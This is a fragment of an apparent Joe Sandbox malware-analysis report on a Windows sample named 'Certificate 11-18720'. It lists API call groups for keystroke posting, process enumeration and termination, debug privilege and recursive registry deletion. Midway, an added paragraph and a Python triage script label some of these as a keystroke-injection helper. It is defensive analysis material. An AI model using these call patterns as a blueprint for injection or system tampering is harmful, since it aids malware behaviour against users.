                                                                                    • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0063DB3C
                                                                                    • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0063DB51
                                                                                    • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0063DB6E
                                                                                    • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0063DB95
                                                                                    • DestroyIcon.USER32(00000000,?,?,?,?,?,?,005DA67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 0063DBA0
                                                                                    • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0063DBBD
                                                                                    • DestroyIcon.USER32(00000000,?,?,?,?,?,?,005DA67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 0063DBC8
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                                    • String ID:
                                                                                    • API String ID: 1268354404-0
                                                                                    APIs
                                                                                      • Part of subcall function 00606EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00605FA6,?), ref: 00606ED8
                                                                                      • Part of subcall function 00606EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00605FA6,?), ref: 00606EF1
                                                                                      • Part of subcall function 006072CB: GetFileAttributesW.KERNEL32(?,00606019), ref: 006072CC
                                                                                    • lstrcmpiW.KERNEL32(?,?), ref: 006075CA
                                                                                    • _wcscmp.LIBCMT ref: 006075E2
                                                                                    • MoveFileW.KERNEL32(?,?), ref: 006075FB
                                                                                    Similarity
                                                                                    • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                                                    • String ID:
                                                                                    • API String ID: 793581249-0
                                                                                    APIs
                                                                                    • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,0063DAD1,00000004,00000000,00000000), ref: 005DEAEB
                                                                                    • ShowWindow.USER32(00000000,00000000,00000000,00000000,00000000,?,0063DAD1,00000004,00000000,00000000), ref: 005DEB32
                                                                                    • ShowWindow.USER32(00000000,00000006,00000000,00000000,00000000,?,0063DAD1,00000004,00000000,00000000), ref: 0063DC86
                                                                                    • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,0063DAD1,00000004,00000000,00000000), ref: 0063DCF2
                                                                                    Similarity
                                                                                    • API ID: ShowWindow
                                                                                    • String ID:
                                                                                    • API String ID: 1268545403-0
                                                                                    APIs
                                                                                    • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,005FAEF1,00000B00,?,?), ref: 005FB26C
                                                                                    • HeapAlloc.KERNEL32(00000000,?,005FAEF1,00000B00,?,?), ref: 005FB273
                                                                                    • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,005FAEF1,00000B00,?,?), ref: 005FB288
                                                                                    • GetCurrentProcess.KERNEL32(?,00000000,?,005FAEF1,00000B00,?,?), ref: 005FB290
                                                                                    • DuplicateHandle.KERNEL32(00000000,?,005FAEF1,00000B00,?,?), ref: 005FB293
                                                                                    • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,005FAEF1,00000B00,?,?), ref: 005FB2A3
                                                                                    • GetCurrentProcess.KERNEL32(005FAEF1,00000000,?,005FAEF1,00000B00,?,?), ref: 005FB2AB
                                                                                    • DuplicateHandle.KERNEL32(00000000,?,005FAEF1,00000B00,?,?), ref: 005FB2AE
                                                                                    • CreateThread.KERNEL32(00000000,00000000,005FB2D4,00000000,00000000,00000000), ref: 005FB2C8
                                                                                    Similarity
                                                                                    • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                    • String ID:
                                                                                    • API String ID: 1957940570-0
                                                                                    Strings
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: NULL Pointer assignment$Not an Object type
                                                                                    • API String ID: 0-572801152
                                                                                    APIs
                                                                                      • Part of subcall function 005C936C: __swprintf.LIBCMT ref: 005C93AB
                                                                                      • Part of subcall function 005C936C: __itow.LIBCMT ref: 005C93DF
                                                                                      • Part of subcall function 005DC6F4: _wcscpy.LIBCMT ref: 005DC717
                                                                                    • _wcstok.LIBCMT ref: 0061184E
                                                                                    • _wcscpy.LIBCMT ref: 006118DD
                                                                                    • _memset.LIBCMT ref: 00611910
                                                                                    Strings
                                                                                    Similarity
                                                                                    • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                                                    • String ID: X$p2gl2g
                                                                                    • API String ID: 774024439-3511325126
                                                                                    APIs
                                                                                    • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00629B19
                                                                                    • SendMessageW.USER32(?,00001036,00000000,?), ref: 00629B2D
                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00629B47
                                                                                    • _wcscat.LIBCMT ref: 00629BA2
                                                                                    • SendMessageW.USER32(?,00001057,00000000,?), ref: 00629BB9
                                                                                    • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00629BE7
                                                                                    Strings
                                                                                    Similarity
                                                                                    • API ID: MessageSend$Window_wcscat
                                                                                    • String ID: SysListView32
                                                                                    • API String ID: 307300125-78025650
                                                                                    APIs
                                                                                      • Part of subcall function 00606532: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00606554
                                                                                      • Part of subcall function 00606532: Process32FirstW.KERNEL32(00000000,0000022C), ref: 00606564
                                                                                      • Part of subcall function 00606532: CloseHandle.KERNEL32(00000000,?,00000000), ref: 006065F9
                                                                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0062179A
                                                                                    • GetLastError.KERNEL32 ref: 006217AD
                                                                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 006217D9
                                                                                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 00621855
                                                                                    • GetLastError.KERNEL32(00000000), ref: 00621860
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00621895
                                                                                    Strings
                                                                                    Similarity
                                                                                    • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                    • String ID: SeDebugPrivilege
                                                                                    • API String ID: 2533919879-2896544425
                                                                                    APIs
                                                                                    • LoadIconW.USER32(00000000,00007F03), ref: 006058B8
                                                                                    Strings
                                                                                    Similarity
                                                                                    • API ID: IconLoad
                                                                                    • String ID: blank$info$question$stop$warning
                                                                                    • API String ID: 2457776203-404129466
                                                                                    APIs
                                                                                    • SafeArrayGetVartype.OLEAUT32(?,00000000), ref: 0060A806
Similarity
• API ID: ArraySafeVartype
• String ID:
• API String ID: 1725837607-0
APIs
• GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00606B63
• LoadStringW.USER32(00000000), ref: 00606B6A
• GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00606B80
• LoadStringW.USER32(00000000), ref: 00606B87
• _wprintf.LIBCMT ref: 00606BAD
• MessageBoxW.USER32(00000000,?,?,00011010), ref: 00606BCB
Strings
• %s (%d) : ==> %s: %s %s, xrefs: 00606BA8
Similarity
• API ID: HandleLoadModuleString$Message_wprintf
• String ID: %s (%d) : ==> %s: %s %s
• API String ID: 3648134473-3128320259
APIs
  • Part of subcall function 00623C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00622BB5,?,?), ref: 00623C1D
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00622BF6
Similarity
• API ID: BuffCharConnectRegistryUpper
• String ID:
• API String ID: 2595220575-0
APIs
• select.WSOCK32 ref: 00619691
• WSAGetLastError.WSOCK32(00000000), ref: 0061969E
• __WSAFDIsSet.WSOCK32(00000000,?,00000000), ref: 006196C8
• #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 006196E9
• WSAGetLastError.WSOCK32(00000000), ref: 006196F8
• inet_ntoa.WSOCK32(?), ref: 00619765
• htons.WSOCK32(?,?,?,00000000,?), ref: 006197AA
Similarity
• API ID: ErrorLast$htonsinet_ntoaselect
• String ID:
• API String ID: 500251541-0
APIs
• __mtinitlocknum.LIBCMT ref: 005EA991
  • Part of subcall function 005E7D7C: __FF_MSGBANNER.LIBCMT ref: 005E7D91
  • Part of subcall function 005E7D7C: __NMSG_WRITE.LIBCMT ref: 005E7D98
  • Part of subcall function 005E7D7C: __malloc_crt.LIBCMT ref: 005E7DB8
• __lock.LIBCMT ref: 005EA9A4
• __lock.LIBCMT ref: 005EA9F0
• InitializeCriticalSectionAndSpinCount.KERNEL32(8000000C,00000FA0,00676DE0,00000018,005F5E7B,?,00000000,00000109), ref: 005EAA0C
• EnterCriticalSection.KERNEL32(8000000C,00676DE0,00000018,005F5E7B,?,00000000,00000109), ref: 005EAA29
• LeaveCriticalSection.KERNEL32(8000000C), ref: 005EAA39
Similarity
• API ID: CriticalSection$__lock$CountEnterInitializeLeaveSpin__malloc_crt__mtinitlocknum
• String ID:
• API String ID: 1422805418-0
APIs
• DeleteObject.GDI32(00000000), ref: 00628EE4
• GetDC.USER32(00000000), ref: 00628EEC
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 00628EF7
• ReleaseDC.USER32(00000000,00000000), ref: 00628F03
• CreateFontW.GDI32(?,00000000,00000000,00000000,00000000,?,?,?,00000001,00000004,00000000,?,00000000,?), ref: 00628F3F
• SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00628F50
• MoveWindow.USER32(?,?,?,?,?,00000000,?,?,0062BD19,?,?,000000FF,00000000,?,000000FF,?), ref: 00628F8A
• SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00628FAA
Similarity
• API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
• String ID:
• API String ID: 3864802216-0
APIs
  • Part of subcall function 005DB34E: GetWindowLongW.USER32(?,000000EB), ref: 005DB35F
• GetSystemMetrics.USER32(0000000F), ref: 0063016D
• MoveWindow.USER32(00000003,?,00000000,00000001,00000000,00000000,?,?,?), ref: 0063038D
• SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 006303AB
• InvalidateRect.USER32(?,00000000,00000001,?), ref: 006303D6
• SendMessageW.USER32(00000003,00000469,?,00000000), ref: 006303FF
• ShowWindow.USER32(00000003,00000000), ref: 00630421
• DefDlgProcW.USER32(?,00000005,?,?), ref: 00630440
Similarity
• API ID: Window$MessageSend$InvalidateLongMetricsMoveProcRectShowSystem
• String ID:
• API String ID: 3356174886-0
APIs
• _memset.LIBCMT ref: 0062225A
• _memset.LIBCMT ref: 00622323
• ShellExecuteExW.SHELL32(?), ref: 00622368
  • Part of subcall function 005C936C: __swprintf.LIBCMT ref: 005C93AB
  • Part of subcall function 005C936C: __itow.LIBCMT ref: 005C93DF
  • Part of subcall function 005DC6F4: _wcscpy.LIBCMT ref: 005DC717
• CloseHandle.KERNEL32(00000000), ref: 0062242F
• FreeLibrary.KERNEL32(00000000), ref: 0062243E
Strings
Similarity
• API ID: _memset$CloseExecuteFreeHandleLibraryShell__itow__swprintf_wcscpy
• String ID: @
• API String ID: 4082843840-2766056989
APIs
• GetParent.USER32(?), ref: 00603DE7
• GetKeyboardState.USER32(?), ref: 00603DFC
• SetKeyboardState.USER32(?), ref: 00603E5D
• PostMessageW.USER32(?,00000101,00000010,?), ref: 00603E8B
• PostMessageW.USER32(?,00000101,00000011,?), ref: 00603EAA
• PostMessageW.USER32(?,00000101,00000012,?), ref: 00603EF0
• PostMessageW.USER32(?,00000101,0000005B,?), ref: 00603F13
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessagePost$KeyboardState$Parent
                                                                                    • String ID:
                                                                                    • API String ID: 87235514-0
                                                                                    • Opcode ID: f1cfaadeddd8d2c82bfd42457bc3152523047db9dcf2c864cd7398c7ad42f50d
                                                                                    • Instruction ID: 5909de104200ac2195dcfbfef0f5f70046eafb8570ce73bc52d361d2d656e7d3
                                                                                    • Opcode Fuzzy Hash: f1cfaadeddd8d2c82bfd42457bc3152523047db9dcf2c864cd7398c7ad42f50d
                                                                                    • Instruction Fuzzy Hash: 9E51E3A0A847E23DFB3A4324CC45BF77EAE5B06305F08858DE1D546AD2D794AEC4D750
APIs
• GetParent.USER32(00000000), ref: 00603C02
• GetKeyboardState.USER32(?), ref: 00603C17
• SetKeyboardState.USER32(?), ref: 00603C78
• PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00603CA4
• PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00603CC1
• PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00603D05
• PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00603D26
Memory Dump Source
• Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
• Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
Similarity
• API ID: MessagePost$KeyboardState$Parent
• String ID:
• API String ID: 87235514-0
• Opcode ID: bbb4496fca0210b1b18d9fda4e2dd3e390c2f98641bc34360cf9de6a8c3c9fcb
• Instruction ID: 008f48f93fb87d313f3eb2c52d676106a64f81688e6aa8af7bbb453ac3be6adf
• Opcode Fuzzy Hash: bbb4496fca0210b1b18d9fda4e2dd3e390c2f98641bc34360cf9de6a8c3c9fcb
• Instruction Fuzzy Hash: 285126A05847E53DFB3A83248C05BF7BF9E9F06305F088489E1C5967C2D694EE84D750
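The two entries above (functions 00603DE7 and 00603C02) post the same four virtual keys to the window's parent: 0x10 is VK_SHIFT, 0x11 VK_CONTROL, 0x12 VK_MENU (Alt) and 0x5B VK_LWIN, with message 0x0101 (WM_KEYUP) in the first function and 0x0100 (WM_KEYDOWN) in the second, each bracketed by GetKeyboardState/SetKeyboardState. Read together they release and re-press the modifier keys, which is the helper a keystroke-injection routine needs before and after it types into a target window. The Python decoder below is an added example, not part of the Joe Sandbox report or of the sample: it parses API lines in the report's own "• Api.MODULE(args), ref: ADDR" format, resolves those Win32 constants, and labels the recurring API groupings; the same labels also fit the RegEnumKeyExW/RegOpenKeyExW/RegDeleteKeyW and CreateToolhelp32Snapshot/Process32FirstW/Process32NextW entries further down this section. The pattern names are my own classification rather than Joe Sandbox signature names, and the sample lines are copied from the report entries.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# Documented Win32 values for the constants that appear in the report's
# argument lists (standard SDK names; only the ones needed here).
WINDOW_MESSAGES = {0x0100: "WM_KEYDOWN", 0x0101: "WM_KEYUP"}
VIRTUAL_KEYS = {0x10: "VK_SHIFT", 0x11: "VK_CONTROL", 0x12: "VK_MENU", 0x5B: "VK_LWIN"}

# My own labels for API groupings (not Joe Sandbox signature names). An entry
# matches a label when every listed API appears as a direct call.
PATTERNS = {
    "keystroke_injection": {"GetKeyboardState", "SetKeyboardState", "PostMessageW"},
    "recursive_registry_delete": {"RegEnumKeyExW", "RegOpenKeyExW", "RegDeleteKeyW"},
    "process_enumeration": {"CreateToolhelp32Snapshot", "Process32FirstW", "Process32NextW"},
}

# One "• Api.MODULE(args), ref: ADDR" line. The argument list is optional because
# the plugin omits it for some calls, e.g. "SysAllocString.OLEAUT32 ref: 00600A15".
LINE_RE = re.compile(
    r"^•?\s*(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)


@dataclass(frozen=True)
class Call:
    api: str
    module: str
    args: Tuple[Optional[int], ...]  # None where the plugin printed "?"
    ref: int


def parse_call(line: str) -> Optional[Call]:
    """Parse one API line; 'Part of subcall function' lines return None."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    args: List[Optional[int]] = []
    if m.group("args"):
        for a in m.group("args").split(","):
            a = a.strip()
            args.append(None if a == "?" else int(a, 16))
    return Call(m.group("api"), m.group("module"), tuple(args), int(m.group("ref"), 16))


def describe(call: Call) -> str:
    """Render a call with its window message and virtual-key constants resolved."""
    if call.api in ("PostMessageW", "SendMessageW") and len(call.args) >= 3:
        msg, wparam = call.args[1], call.args[2]
        name = "?" if msg is None else WINDOW_MESSAGES.get(msg, f"0x{msg:04X}")
        if name in ("WM_KEYDOWN", "WM_KEYUP") and wparam is not None:
            key = VIRTUAL_KEYS.get(wparam, f"0x{wparam:02X}")
            return f"{call.api} {name} {key}"
        return f"{call.api} {name}"
    return call.api


def summarize(lines: List[str]) -> Dict[str, object]:
    """Classify one report entry (its 'APIs' lines) and list the keys it synthesises."""
    calls = [c for c in map(parse_call, lines) if c is not None]
    steps = [describe(c) for c in calls]
    apis = {c.api for c in calls}
    keys = [s.split()[-1] for s in steps if " WM_KEY" in s]
    ups = sum("WM_KEYUP" in s for s in steps)
    downs = sum("WM_KEYDOWN" in s for s in steps)
    if ups and not downs:
        direction = "release"
    elif downs and not ups:
        direction = "press"
    else:
        direction = "mixed" if ups else None
    return {
        "refs": [f"{c.ref:08X}" for c in calls],
        "steps": steps,
        "patterns": sorted(n for n, need in PATTERNS.items() if need <= apis),
        "modifier_keys": keys,
        "key_direction": direction,
    }


# Sample input: API lines copied from the report entries (functions 00603DE7,
# 00603C02, 00623DA1 and 00621C18).
ENTRY_603DE7 = """• GetParent.USER32(?), ref: 00603DE7
• GetKeyboardState.USER32(?), ref: 00603DFC
• SetKeyboardState.USER32(?), ref: 00603E5D
• PostMessageW.USER32(?,00000101,00000010,?), ref: 00603E8B
• PostMessageW.USER32(?,00000101,00000011,?), ref: 00603EAA
• PostMessageW.USER32(?,00000101,00000012,?), ref: 00603EF0
• PostMessageW.USER32(?,00000101,0000005B,?), ref: 00603F13""".splitlines()
ENTRY_603C02 = """• GetParent.USER32(00000000), ref: 00603C02
• GetKeyboardState.USER32(?), ref: 00603C17
• SetKeyboardState.USER32(?), ref: 00603C78
• PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00603CA4
• PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00603CC1
• PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00603D05
• PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00603D26""".splitlines()
ENTRY_623DA1 = """• RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?), ref: 00623DA1
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00623DCB
• FreeLibrary.KERNEL32(00000000), ref: 00623E80
  • Part of subcall function 00623D72: RegCloseKey.ADVAPI32(?), ref: 00623DE8
• RegDeleteKeyW.ADVAPI32(?,?), ref: 00623E25""".splitlines()
ENTRY_621C18 = """• CreateToolhelp32Snapshot.KERNEL32 ref: 00621C18
• Process32FirstW.KERNEL32(00000000,?), ref: 00621C26
• __wsplitpath.LIBCMT ref: 00621C54
• _wcscat.LIBCMT ref: 00621C69
• Process32NextW.KERNEL32(00000000,?), ref: 00621CDF
• CloseHandle.KERNEL32(00000000,?,?,00000002,00000000), ref: 00621CF1""".splitlines()

if __name__ == "__main__":
    for entry in (ENTRY_603DE7, ENTRY_603C02, ENTRY_623DA1, ENTRY_621C18):
        print(summarize(entry))
```

Feeding the whole "APIs" section of a report through summarize() turns the hex argument lists into a short per-function triage line, and the label table is the place to add further groupings (for example the SysAllocString/StringFromGUID2 sequence) once they are seen recurring across samples.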
APIs
• RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?), ref: 00623DA1
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00623DCB
• FreeLibrary.KERNEL32(00000000), ref: 00623E80
  • Part of subcall function 00623D72: RegCloseKey.ADVAPI32(?), ref: 00623DE8
  • Part of subcall function 00623D72: FreeLibrary.KERNEL32(?), ref: 00623E3A
  • Part of subcall function 00623D72: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00623E5D
• RegDeleteKeyW.ADVAPI32(?,?), ref: 00623E25
Memory Dump Source
• Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
• Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
Similarity
• API ID: EnumFreeLibrary$CloseDeleteOpen
• String ID:
• API String ID: 395352322-0
• Opcode ID: 402bdf0f21b8b495d23b4eb365c8677f681dbd99f7576b3849535e8dc94d3bf6
• Instruction ID: 65dc8b609860e2ce74bb165492142cfbe729bf9f3a99ed3b739e77751f4d3a84
• Opcode Fuzzy Hash: 402bdf0f21b8b495d23b4eb365c8677f681dbd99f7576b3849535e8dc94d3bf6
• Instruction Fuzzy Hash: F83119B5D01129BFDB159F90EC85AFFB7BEEF09340F00016AA552A2250D7749F499FA0
APIs
• SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00628FE7
• GetWindowLongW.USER32(00F1E2E0,000000F0), ref: 0062901A
• GetWindowLongW.USER32(00F1E2E0,000000F0), ref: 0062904F
• SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00629081
• SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 006290AB
• GetWindowLongW.USER32(00000000,000000F0), ref: 006290BC
• SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 006290D6
Memory Dump Source
• Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
• Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
Similarity
• API ID: LongWindow$MessageSend
• String ID:
• API String ID: 2178440468-0
• Opcode ID: 94beba7c85f1bb8ab0ba074970b112fb99d806e4ae6c26d1179b32abbcd24dd9
• Instruction ID: a82fe83c8573d526032c6b13452a5774719da38888750636f09d8573dfa8a996
• Opcode Fuzzy Hash: 94beba7c85f1bb8ab0ba074970b112fb99d806e4ae6c26d1179b32abbcd24dd9
• Instruction Fuzzy Hash: 9C315B34600629EFDB20CF58EC84F9437A6FB8A314F151268FA198F2B1CB71A841CF50
APIs
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 006008F2
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00600918
• SysAllocString.OLEAUT32(00000000), ref: 0060091B
• SysAllocString.OLEAUT32(?), ref: 00600939
• SysFreeString.OLEAUT32(?), ref: 00600942
• StringFromGUID2.OLE32(?,?,00000028), ref: 00600967
• SysAllocString.OLEAUT32(?), ref: 00600975
Memory Dump Source
• Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
• Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
Similarity
• API ID: String$Alloc$ByteCharMultiWide$FreeFrom
• String ID:
• API String ID: 3761583154-0
• Opcode ID: 82ed6a0a9ba51bcba079a486799f3d3e9fe6b22518c8d9ed4ab27728ab5e637a
• Instruction ID: 52f90d285ff2dd6dab38b692e837df74080ad0e45609630b6a0316bd77dab9a8
• Opcode Fuzzy Hash: 82ed6a0a9ba51bcba079a486799f3d3e9fe6b22518c8d9ed4ab27728ab5e637a
• Instruction Fuzzy Hash: 24215676601219AFEB149F68DC88EEB77EDFF09360B009126F919DB291D670EC458760
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
• Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
Similarity
• API ID: __wcsnicmp
• String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
• API String ID: 1038674560-2734436370
• Opcode ID: 2709ae02aa038db3628e0399c64f1386ec750d4c7bdfb21b08c5699d225b4031
• Instruction ID: 29475f892c041b59ec9edd9870115dce2c7e4adee27825ce1b721c805cdf06db
• Opcode Fuzzy Hash: 2709ae02aa038db3628e0399c64f1386ec750d4c7bdfb21b08c5699d225b4031
• Instruction Fuzzy Hash: DD216D7118455367C239AB24DC2EEB777DAFF95300F504026F486972C1E6619992C399
APIs
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 006009CB
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 006009F1
• SysAllocString.OLEAUT32(00000000), ref: 006009F4
• SysAllocString.OLEAUT32 ref: 00600A15
• SysFreeString.OLEAUT32 ref: 00600A1E
• StringFromGUID2.OLE32(?,?,00000028), ref: 00600A38
• SysAllocString.OLEAUT32(?), ref: 00600A46
Memory Dump Source
• Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
• Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
Similarity
• API ID: String$Alloc$ByteCharMultiWide$FreeFrom
• String ID:
• API String ID: 3761583154-0
• Opcode ID: d45d5bc59e301fcc5dcec8493397856fd4949e3dad0bdd4d54571ab4eb8acc26
• Instruction ID: 0fba4298728d353391861f3313a6b13d3ddf3a320882f41be7fcf6620194cc1a
